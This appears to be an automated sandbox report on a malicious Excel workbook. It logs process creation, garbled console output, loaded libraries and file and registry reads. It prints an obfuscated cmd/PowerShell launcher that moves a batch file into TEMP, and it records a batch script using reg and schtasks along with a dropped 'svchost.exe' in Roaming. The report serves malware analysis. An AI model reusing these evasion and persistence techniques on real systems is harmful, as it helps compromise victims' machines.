File created: C:\Users\user\AppData\Local\Temp\CVREC70.tmp

Jump to behavior

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

OLE indicator, Workbook stream: true

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....J................T.............}..v....(K......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....8O......0.................b.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....O................T.............}..v....pP......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.......;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.T.............}..v.....T...... .................b.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....8U................T.............}..v.....U......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G...............>/.j......b...............T.............}..v....H\......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j.....]................T.............}..v.....]......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S...............>/.j......b...............T.............}..v.....b......0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S..................j....`c................T.............}..v.....c......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._...............>/.j......b...............T.............}..v.....i......0.......................Z.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._..................j.....i................T.............}..v....8j......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k...............>/.j......b...............T.............}..v.....q......0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k..................j.....q................T.............}..v....8r......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .I.t.e.m.C.o.m.m.a.n.d.......T.............}..v.....u......0.................b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w..................j.....v................T.............}..v.....w......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......>/.j......b...............T.............}..v.....z......0.................b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X{................T.............}..v.....{......0...............H.b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#.................;...............;.......6.....`I8........v.....................K?.............r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................#.j.....n................T.............}..v....8o......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../.......V.'. .d.o.e.s. .n.o.t. .e.x.i.s.t...............}..v....Hs......0...............8.d.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../................#.j.....t................T.............}..v.....t......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.T.............}..v.....x......0...............8.d.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;................#.j....Hy................T.............}..v.....y......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................<.j......d...............T.............}..v.....~......0.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G................#.j......................T.............}..v....(.......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................<.j......d...............T.............}..v....P.......0.......................^.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....S................#.j......................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................<.j......d...............T.............}..v............0.......................`.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v...._................#.j....h.................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................<.j......d...............T.............}..v............0...............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....k................#.j....h.................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w....... . . .o.c.a.t.i.o.n.C.o.m.m.a.n.d.T.............}..v............0...............8.d.....".......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....w................#.j......................T.............}..v....0.......0.................d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ........<.j......d...............T.............}..v............0...............8.d.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................#.j....x.................T.............}..v............0.................d.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................@{>.....................J^>.......................B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............m.o.d.e........./.........................$......$.J............/.................$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .1.8.,.1. .............................*Y>.....m.o.d.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....m.o.d.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................@{>.....................J^>.......................B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............c.o.l.o.r......./.........................$......$.J............/.................$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .F.E. .................................*Y>.....c.o.l.o..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....c.o.l.o..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................J^>.......................B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t.l.o.c.a.l./.........................$......$.J............/.................$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................*Y>.....s.e.t.l..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h..................................J....................J^>.....`{.J..............B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............f.o.r...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.F...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .".t.o.k.e.n.s.=.4.-.5. .d.e.l.i.m.s.=... ."...X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .%.i. .i.n. ...=.4.-.5.................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............(.'.v.e.r.'.). .d.o. .5.................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t...........d.o. .5.................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .V.E.R.S.I.O.N.=.%.i...%.j. ............Y>.....s.e.t............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................p.C......................S>..............iB.......................$..............iB.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.e.t............\C.......................B...............C........J....x.........$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .V.E.R.S.I.O.N.=.6...1. ................^>.....s.e.t....iB.....................h.$..............iB.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................=.6...1..................^>.....s.e.t....iB.....................h.$..............iB.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............................`{.J....................J^>......$.J..............B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............".6...1.". .=.=. .".1.0...0.". ..........Y>.....i.f. ............DB...............$..... .......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............(................DB..................... .......................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................Y>.....(................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............e.c.h.o.........}..v............................p.......T.......................8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... .".W.i.n.d.o.w.s. .1.0. .d.e.t.e.c.t.e.d.". . .e.c.h.o..........DB...............$.....0.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... ..........DB......................X>......................DB.............8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............r.e.g...........}..v............................p.......f.........................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................X>.....r.e.g............DB.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................_>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................ZX>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............t.i.m.e.o.u.t...}..v............................................................x.$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................_>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............s.c.h.t.a.s.k.s.}..v............................p.................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p.......................................................J_>.....s.c.h.t..........DB.....................v.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>.....................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. .................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................._>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... ..... .........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............r.e.g...........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................^>.....r.e.g............DB.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p........................................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............). ......................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............".6...1.". .=.=. .".6...3.". ............Y>.....i.f. ............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............(................DB.............................................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p...............e.c.h.o.........}..v............................p.......6.......................8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................p............... .".W.i.n.d.o.w.s. .8...1. .d.e.t.e.c.t.e.d.". . .c.h.o..........DB...............$.....2.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........}..v............................h.......I.........................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................X>.....r.e.g............DB.............................................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................_>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................ZX>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................p.......................x.$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.t. .2. . ............................_>.....t.i.m.e..........DB.............H.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................_>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................._>..... ./.t. ..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................._>......................DB.............x.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h.......................................................J_>.....s.c.h.t..........DB.....................v.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>.....................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. .................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................._>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............1.>......................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... .........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................^>.....r.e.g............DB.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............). ......................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............".6...1.". .=.=. .".6...2.". ............Y>.....i.f. ............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............(................DB.............................................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h........................................................Y>.....(................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............e.c.h.o.........}..v............................h...............................8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h............... ..... ..........DB......................X>......................DB.............8.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............r.e.g...........}..v............................h.................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............t.i.m.e.o.u.t...}..v....................................N.......................x.$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................h...............s.c.h.t.a.s.k.s.}..v............................h.......t.........................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>.....................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. .................................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................._>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................t.i.m.e.o.u.t...}..v..............................................................$............. ..... .........	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ./.t. .3. . ............................^>.....t.i.m.e..........DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................1.>......................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................n.u.l. ..................................^>..... ./.t. ..........DB.............X.$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................ ..... .........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................r.e.g...........d1......................:_>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................^>.....r.e.g............DB.....................T.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................). ......................................Y>........J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .................................................DB.....................*Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................................`{.J....................J^>......$.J..............B...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J..............$.....2..................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................i.f. ...........`{.J....................*Y>.....X%.J.............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................".6...1.". .=.=. .".6...1.". ............Y>.....i.f. ............DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................(................DB.............................................d1......h..v......$........................J....	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.m.d...........................................(................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................X>.....C.m.d............DB.....................t.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ................................). ..............DB......................Y>......................DB...............$.............................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......$.....`.$.....8.$.....B.......................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................0.......................(.P.....................$.......R.................................................................2.....	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................t...........E.R.R.O.R.:. ...................8...............................................................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................t...........E.R.R.O.(.P.....................8.......................................................j.......x...............

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
